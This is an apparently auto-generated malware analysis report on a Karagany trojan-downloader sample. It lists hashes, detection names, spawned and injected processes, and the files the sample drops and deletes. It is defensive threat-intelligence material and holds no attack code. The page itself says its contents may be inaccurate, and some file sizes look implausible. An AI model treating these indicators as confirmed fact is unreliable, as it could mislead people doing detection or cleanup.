Trojan-Downloader.Win32.Karagany.1_51d710bdc9

by malwarelabrobot on June 14th, 2014 in Malware Descriptions.

Susp_Dropper (Kaspersky), Trojan-Downloader.Win32.Karagany.1.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 51d710bdc9e0f562bde855cddd512c4b
SHA1: 13203acb5bb2ba77587b9a221104b8714776db3e
SHA256: ed106b9a5e54068c0a87c688bfa00cfd54b0048eb6ca13342e244e6b130ffc40
SSDeep: 49152:mJdynoenkg0QL4lVcTqQ/lX1sIdMp4Xlu6PjXr6H1nc29lDBu0qTz2CrGuJ3i:Sdyoenk9o22Ls4Mp4XvjX2Dy04XjJ3i
Size: 3574038 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: a monitoring
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

pczh_107_306.exe:232
sc.exe:2108
sc.exe:2092
taskkill.exe:1896
-8670_360_MM.exe:1148
vcredist_x86.exe:1940
MsiExec.exe:3856
tha.exe:3316
cacls.exe:1712

The Trojan-Downloader injects its code into the following process(es):

%original file name%.exe:348
Mnying.exe:2364
Mnying.exe:1992
Mnying.exe:3116
Ainqngz4.0.exe:2176
tjjrfx_70745.exe:456
fdcard.exe:2184
services.exe:756

File activity

The process %original file name%.exe:348 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\kele\tjjrfx_70745.exe (63950 bytes)
%Program Files%\kele\uboskin\html\logo.gif (9 bytes)
%Program Files%\kele\uboskin\skin\dibulan.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\System.dll (11 bytes)
%Program Files%\kele\uboskin\skin\hp.jpg (368 bytes)
%Program Files%\kele\uboskin\skin\Close.jpg (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\open (947 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·µ¼º½.lnk (1 bytes)
%Program Files%\kele\uboskin\skin\logo.jpg (784 bytes)
%Program Files%\kele\uboskin\config.ini (290 bytes)
%Program Files%\kele\-8670_360_MM.exe (33295 bytes)
%Program Files%\kele\uboskin\app\loading.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NSISdl.dll (14 bytes)
%Program Files%\kele\uboskin\skin\tv.jpg (784 bytes)
%Program Files%\kele\uboskin\skin\max-2.jpg (319 bytes)
%Program Files%\kele\uboskin\html\loading.swf (2 bytes)
%Program Files%\kele\sg1.ico (9 bytes)
%Program Files%\kele\uboskin\html\loading.html (679 bytes)
%Program Files%\kele\ubohe.db (482 bytes)
%Program Files%\kele\tj.txt (3 bytes)
%Program Files%\kele\uboskin\skin\bf.jpg (4 bytes)
%Program Files%\kele\uboskin\icon.ico (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (126061 bytes)
%Program Files%\kele\uboskin\skin\pk.jpg (5 bytes)
%Program Files%\kele\uboskin\skin\menu.jpg (1 bytes)
%Program Files%\kele\pczh_107_306.exe (15168 bytes)
%Program Files%\kele\uboskin\skin\list.jpg (670 bytes)
%Program Files%\kele\uboskin\app\loading.swf (2 bytes)
%Program Files%\kele\uboskin\skin\zb.jpg (4 bytes)
%Program Files%\kele\yunboplayer.exe (6360 bytes)
%Program Files%\kele\uboskin\skin\logo.tif (11344 bytes)
%Program Files%\kele\uboskin\uboplaylist.xml (679 bytes)
%Program Files%\kele\Ëѹ·µ¼º½.url (237 bytes)
%Program Files%\kele\uboskin\skin\biaotilan.jpg (1 bytes)
%Program Files%\kele\uboskin\skin\lt.jpg (885 bytes)
%Program Files%\kele\uboskin\html\gbook.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\goodpic_dae_619.exe (266213 bytes)
%Program Files%\kele\link.txt (349 bytes)
%Program Files%\kele\uboskin\skin\max-1.jpg (372 bytes)
%Program Files%\kele\uboskin\skin\bj.jpg (1552 bytes)
%Program Files%\kele\ie.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\2345µ¼º½.lnk (1 bytes)
%Program Files%\kele\2345µ¼º½.url (232 bytes)
%Program Files%\kele\uboskin\skin\min.jpg (242 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1.tmp (0 bytes)

The process pczh_107_306.exe:232 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.4.0\°®Çé.ÖÇ»Û.4.0.lnk (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstA.tmp (20366 bytes)
%Program Files%\ainqngz4.0\Ainqngz4.0.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\tj.html (91 bytes)
%Program Files%\ainqngz4.0\Dcsvr.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\tj[2].htm (91 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Desktop\°®Çé.ÖÇ»Û.4.0.lnk (708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.4.0\жÔØ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsD.tmp (6 bytes)
%Program Files%\ainqngz4.0\fdcard.exe (5520 bytes)
%Documents and Settings%\%current user%\Templates\1320146202834744\YYM_955WD30.gif (994 bytes)
%Program Files%\ainqngz4.0\uninstall.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Base64.dll (4 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\tj.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Base64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Templates\1320146202834744 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\md5dll.dll (0 bytes)
%Program Files%\ainqngz4.0\0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsC.tmp (0 bytes)
%Documents and Settings%\%current user%\Templates\1320146202834744\YYM_955WD30.gif (0 bytes)

The process Mnying.exe:2364 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[4].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000KXFAo9s7mobL64F3f[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\adx[3].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\sync_pos[1].htm (2 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\www.mnh.quzhao[1].xml (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CAXO32N7 (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000AV1EJPWogCd7YFH9s[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[1].js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000cuQgQTB3g3OFkZR_0[1].swf (7534 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f0000vLC1Ofnh0LFprLSs[1].swf (2705 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@q428[1].txt (4762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[2].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\sync[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\s[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=6781&tlm=1398686606&tcn=1402680641&tpr=1402680635228&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\3&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=47&tlm=1398686606&tcn=1402680601&tpr=1402680601119&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[3].htm (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CAI1GF6H.htm (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\css_mini[1].css (4 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAIB41UV.htm (1203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\cpro_media_small[1].png (645 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\sync[1].htm (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f0000I414Fs9Ex6MNwGg6[1].swf (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000DYlKNGeiuam3jyYls[1].swf (777 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (368 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (7936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000AY4GuJTGCsxgDBTe0[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=1468&tlm=1398686606&tcn=1402680569&tpr=1402680568181&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAKXQFSH.swf (9115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000KLx1mYZLI-ed9V_os[1].jpg (4435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000Z60Ab17JZtxZIQVnf[1].swf (1321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[1].html (1215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\mini_mnh_428[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAET0FSV.htm (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000c60Ma_q1Fr10rMvif[1].gif (4557 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CA6Z21AJ.swf (3931 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAIZWDOT.htm (2072 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=2031&tlm=1398686606&tcn=1402680603&tpr=1402680601119&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAPHGR31.htm (2089 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CAC5Y51U.htm (435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\adx[2].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000Z60AW17JZtxZIQVsf[1].png (4801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mini_mnh_428[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CACD6BGD.swf (3715 bytes)
%Documents and Settings%\%current user%\UserData\4XCFALMJ\www.mnh.quzhao[1].xml (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f0002dsZcSR_Ik2MbXxf0[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\adx[1].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000FtVHObQA_TQpKpGts[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\id=PWRkPj6&gp=10&time=nHcdPHDsnHD4nf[1].png (819 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000Qb3PMHRPyvfvvYfG6[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000DEUfQYMcAovJj_RMf[1].swf (8375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\adx[3].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\wh[1].js (6519 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000ZfQTmWMFwX7fiSJP0[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000KQDyCuvJFLfvix_cf[1].png (3733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\adx[2].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\sync[2].htm (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f0000nHWK3REpexd7u1q6[1].swf (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[3].js (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000auhI5Es2H1IzqY5W6[1].png (2660 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f0000mUMSYcE3MmsKSaAf[1].swf (13565 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=3235&tlm=1398686606&tcn=1402680638&tpr=1402680635228&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[1].htm (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CACT67OH.htm (2583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CA96ZLPM.htm (5026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=593&tlm=1398686606&tcn=1402680568&tpr=1402680568181&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f0007ZNkmgz9HxtqBwkgs[1].swf (777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\o[2].htm (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[3].js (24 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (366 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\AC_RunActiveContent[2].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[1].js (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\mnh_428cc[1].htm (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\wh[2].js (7200 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f0002dsZ58R_Ik2MbXxd0[1].jpg (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000QfY4TDI-RZtJ88Rf0[1].png (3235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAENI3QT (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAAXO9MV.htm (2881 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[2].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\nav_bg[1].gif (2309 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\adx[1].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\8[1].css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000AY4Gp2TGCsxgDBTq0[1].swf (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[2].js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000nG8QJ8V4VWIdqsns6[1].jpg (5938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\c[2].js (7080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[1].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=2671&tlm=1398686606&tcn=1402680570&tpr=1402680568181&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\sync_pos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\sync[1].htm (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CA0VYZQG.swf (5407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=625&tlm=1398686606&tcn=1402680635&tpr=1402680635228&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\adx[1].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\o[1].htm (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\AC_RunActiveContent[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[3].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000AV1EG-sYD_d7YFHc6[1].jpg (1345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000rmn6cn7D14hDeZLyf[1].gif (2073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mnh_428cc[1].html (724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\21[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CACPIZKT (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\c[1].js (7522 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (1975 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=953&tlm=1398686606&tcn=1402680602&tpr=1402680601119&dpt=none&coa=&baidu_ (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[5].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CA01SNO7.htm (4757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000jtT4CGxjFHdyV6mBf[1].swf (1321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CA1LB4EV.htm (1967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\mini_mnh_428[1].html (886 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAJMYP73.htm (2072 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\sync[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[2].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\sync_pos[1].htm (0 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\www.mnh.quzhao[1].xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\sync[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@q428[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\sync[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[3].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\AC_RunActiveContent[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[3].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mnh_428cc[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[3].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\c[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\sync[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\UserData\4XCFALMJ\www.mnh.quzhao[1].xml (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\mini_mnh_428[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\wh[1].js (0 bytes)

The process Mnying.exe:1992 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\6[1].png (772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\2[1].png (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\4[1].png (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\3.png (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\2.png (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\5.png (3 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\Down\ETagFile.dat (1228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\7[1].png (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\u2[1].htm (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\5[1].png (773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\tj[1].htm (76 bytes)
